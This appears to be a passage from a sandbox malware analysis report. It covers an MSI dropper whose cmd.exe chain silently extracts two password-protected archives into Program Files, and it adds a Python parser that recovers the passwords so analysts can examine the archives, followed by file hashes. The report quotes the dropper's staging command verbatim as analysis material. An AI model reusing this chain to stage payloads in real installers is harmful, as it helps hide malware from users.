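The cmd.exe step under PID 1520 is where the payload is unpacked: two password-protected archives dropped by the MSI (sCoWxepalfWCObCLKnAyaHfPkmbWUL and cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX) are extracted into the same directory, separated by a ping used as a two-second sleep, and both passwords sit in plain text on the command line. The argument syntax (x <archive> -o<dir> -p<password> -y -x!<pattern>) is 7-Zip's; the report does not identify the renamed extractor binary, so reading it as a 7-Zip-compatible tool is an inference. The following is an added example, not code from the report or the sandbox vendor: a parser that splits the chain on cmd's & operator, strips the start /min "" wrapper and recovers archive, output directory, password and exclusion list for each step, so an analyst can open the archives from the drop directory without running the installer. CMD_CHAIN is the payload of the /c argument copied from the report.

```python
"""Recover archive passwords and extraction order from the report's cmd chain.

Added example, not code from the sandbox report. Treating the renamed
extractor as 7-Zip-compatible is an inference from its argument syntax.
"""

# The argument to cmd.exe /c, copied from the report's process tree.
CMD_CHAIN = (
    r'start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" '
    r'x "C:\Program Files\CPUAimLinux\sCoWxepalfWCObCLKnAyaHfPkmbWUL" '
    r'-o"C:\Program Files\CPUAimLinux\" -p"08136{%Qmb0Mr~q{WXZU" -y '
    r'& ping 127.0.0.1 -n 2 '
    r'& start /min "" "C:\Program Files\CPUAimLinux\fXlHSNCgjpwhjcbESorcUuElETFupI.exe" '
    r'x "C:\Program Files\CPUAimLinux\cuwtzNKpgpoaOTjpwbTJlaaZdnfuAX" '
    r'-x!"1_hHILqDIvDmMm.exe" -x!"sss" -x!"1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe" '
    r'-x!"1_" -x!"1_" -x!"sa" -o"C:\Program Files\CPUAimLinux\" '
    r'-p"86225)AYVohjF3DD0{k[" -y'
)


def split_chain(cmd):
    """Split a cmd.exe command on '&' outside double quotes."""
    steps, cur, in_quote = [], [], False
    for ch in cmd:
        if ch == '"':
            in_quote = not in_quote
        if ch == "&" and not in_quote:
            steps.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    steps.append("".join(cur).strip())
    return [s for s in steps if s]


def tokenize(step):
    """Split on whitespace outside double quotes and drop the quotes; an empty
    "" survives as an empty token (cmd's start uses it as the window title)."""
    tokens, cur, in_quote, quoted = [], [], False, False
    for ch in step:
        if ch == '"':
            in_quote, quoted = not in_quote, True
        elif ch.isspace() and not in_quote:
            if cur or quoted:
                tokens.append("".join(cur))
            cur, quoted = [], False
        else:
            cur.append(ch)
    if cur or quoted:
        tokens.append("".join(cur))
    return tokens


def parse_step(step):
    """Classify one step as a 7-Zip-style extraction, a ping delay, or other."""
    toks = tokenize(step)
    if toks and toks[0].lower() == "start":
        i = 1
        while i < len(toks) and toks[i].startswith("/"):  # /min, /b, ...
            i += 1
        if i < len(toks) and toks[i] == "":                # the "" title
            i += 1
        toks = toks[i:]
    if not toks:
        return {"kind": "empty"}
    if toks[0].lower() == "ping":
        count = int(toks[toks.index("-n") + 1]) if "-n" in toks else 4
        return {"kind": "delay", "target": toks[1], "count": count}
    if len(toks) >= 3 and toks[1].lower() in ("x", "e"):
        info = {"kind": "extract", "exe": toks[0], "archive": toks[2],
                "out_dir": None, "password": None, "exclude": [],
                "assume_yes": False, "other": []}
        for t in toks[3:]:
            if t.startswith("-o"):
                info["out_dir"] = t[2:]
            elif t.startswith("-p"):
                info["password"] = t[2:]
            elif t.startswith("-x!"):
                info["exclude"].append(t[3:])
            elif t == "-y":
                info["assume_yes"] = True
            else:
                info["other"].append(t)
        return info
    return {"kind": "other", "argv": toks}


def parse_chain(cmd):
    """Parse every step of the chain in execution order."""
    return [parse_step(s) for s in split_chain(cmd)]


if __name__ == "__main__":
    for n, step in enumerate(parse_chain(CMD_CHAIN), 1):
        if step["kind"] == "extract":
            print(f"{n}: extract {step['archive']} -> {step['out_dir']} "
                  f"password={step['password']!r} exclude={step['exclude']}")
        else:
            print(f"{n}: {step}")
```

The exclusion list on the second archive is itself a lead: the names it skips (1_hHILqDIvDmMm.exe, 1_bEUAxCisQyQxhNlIqgtfrSfaocnxud.exe) are members of the archive that this run deliberately leaves unextracted, so the archive holds more than the files that appear in the Program Files drop list.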
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 7KB
MD5: 4aca8d053a5f2d4f1304bed01cd88609
SHA1: 9018177ee075a5a260a7e6f9b1dd91180b3e7bdf
SHA256: 8282941d0e99fbb637d91b750d0577f34274f878d803c498ec7b3d5544911520
SHA512: d96455542a7efc68d8b2f46305d561a16a764c4d66e8ecbf187dfbfe24fed97fc30c7c3afef2bc40af42f9519a0f6f830959f0397e481c640a69b722d26fb390

Filesize: 3.1MB
MD5: db6688b70f3255877e15541970145e68
SHA1: 5f69edadeb9e7dae7f4b034031cb325ce1c7f2bd
SHA256: 208f1f3a5928a4b6ea18e91bbbd33ad8d04273f067983e8e09490b1b8a12f7cb
SHA512: 72f588728035f844662381e928ed117134ce2bae1be1848204fc1bd753f37fbdfd4a683ff1454ef944643a51c2fe9944a651b2847428f8d15a1c6c026e0ecfce

Filesize: 1.0MB
MD5: f90ddf18d65bb3153bcdfdc4856ce2a5
SHA1: 611376391f17207d60ca8c2ec81354933f8dac45
SHA256: 62eef5a5e363624007bc29a6ecd3275aec2e5a67eef058df404d145c90e3a0ce
SHA512: f3f20f216ab6fd055f8d494f2758512413cb1cf121a2b51cae4e7b371a595b4dfe8ed4213aa759ccc4569ad6ed792f936304bfb4aac2952a79a3b2bccd293316

Filesize: 2.4MB
MD5: 1b772652a5b64c119b00ec06c00311db
SHA1: afeb3bfba34eccadce4d2141d6d59707c83e9583
SHA256: c98f9a50e0240455ce52e01d4b4e94453438a5a5614c2d424bb485ce1db8fbd4
SHA512: 5cb2761839634a45c4047cbbe31fc30bf140829630d57104fc27fc770a68b2c7d8209181aba17ace9fe85a3f7b705467c14b2ddbc206aca3c3fd542e666f7882

Filesize: 577KB
MD5: c31c4b04558396c6fabab64dcf366534
SHA1: fa836d92edc577d6a17ded47641ba1938589b09a
SHA256: 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512: 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

Filesize: 2.4MB
MD5: 048cee96f68a4c516b3aa1a8a4781e46
SHA1: 5582bb564630c5ead8704d06bcdb427dd9840de5
SHA256: 835e566ab875a5dd955882f57ea01cb2dcc5a82755821a6e951d6eb5a4005293
SHA512: 2bf13570a5c83b4912ed04759c082a24ba8e53ce0dfae74d80032c075f7a1bc55e47c29014bd71332ff87b5c1f2065259b4b24c285bcddc109263204a0f57c32